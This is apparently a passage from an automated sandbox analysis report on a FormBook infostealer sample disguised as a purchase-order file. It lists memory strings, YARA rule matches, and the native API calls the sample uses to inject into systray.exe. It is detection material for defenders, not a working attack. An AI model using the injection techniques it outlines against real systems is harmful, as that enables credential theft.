          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: PO-RFQ # 097663899.exeString found in binary or memory: https://www.gnu.org
          Source: PO-RFQ # 097663899.exeString found in binary or memory: https://www.gnu.org/licenses/
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.249957275.0000000001198000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.PO-RFQ # 097663899.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.PO-RFQ # 097663899.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.PO-RFQ # 097663899.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004181BA NtCreateFile,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041826A NtReadFile,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004182EA NtClose,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041839A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EEB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9560 NtWriteFile,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EEAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EEA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EEA770 NtOpenThread,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EEA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050BAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050BA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050BA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050BB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050BA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E83A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E8270 NtReadFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E82F0 NtClose,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E81C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E839A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E826A NtReadFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E82EA NtClose,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E81BA NtCreateFile,
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 0_2_013E94A8
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 0_2_013EDB4C
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 0_2_013EC148
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 0_2_013EE211
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 0_2_013EA758
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041C07D
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00401030
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041B8C5
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0040117B
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041C1DC
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041BAF2
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041C388
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00408C5E
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00408C60
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041B499
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041B4A6
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00402D87
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00402D90
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041C5A8
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041BE7E
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041BE12
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041CE30
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041BF6A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00402FB0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED20A0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F720A8
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBB090
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61002
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB841F
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBD5E0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED2581
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F71D55
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA0D20
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EC4120
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAF900
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F72D07
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F72EF7
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F722AE
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EC6E30
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F71FF1
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDEBB0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F72B28
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05142D07
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05070D20
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05141D55
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A2581
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_051425DD
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508D5E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508841F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513D466
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05141FF1
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513D616
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05096E30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05142EF7
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507F900
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05094120
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131002
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508B090
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A20A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_051420A8
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_051428EC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05142B28
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AEBB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513DBD2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_051422AE
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030EB8C5
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030D2FB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030ECE31
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030D2D87
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030D2D90
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030EC5A8
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030D8C5E
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030D8C60
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030EB499
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030EB4A6
          Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 0507B150 appears 35 times
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: String function: 00EAB150 appears 35 times
          Source: PO-RFQ # 097663899.exeBinary or memory string: OriginalFilename vs PO-RFQ # 097663899.exe
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.260803980.0000000007560000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll" vs PO-RFQ # 097663899.exe
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251630889.000000000307C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll2 vs PO-RFQ # 097663899.exe
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.249957275.0000000001198000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO-RFQ # 097663899.exe
          Source: PO-RFQ # 097663899.exeBinary or memory string: OriginalFilename vs PO-RFQ # 097663899.exe
          Source: PO-RFQ # 097663899.exe, 00000004.00000002.295144212.0000000000BE8000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamesystray.exej% vs PO-RFQ # 097663899.exe
          Source: PO-RFQ # 097663899.exe, 00000004.00000002.295297599.0000000000F9F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO-RFQ # 097663899.exe
          Source: PO-RFQ # 097663899.exeBinary or memory string: OriginalFilenameUrl.exeB vs PO-RFQ # 097663899.exe
          Source: PO-RFQ # 097663899.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
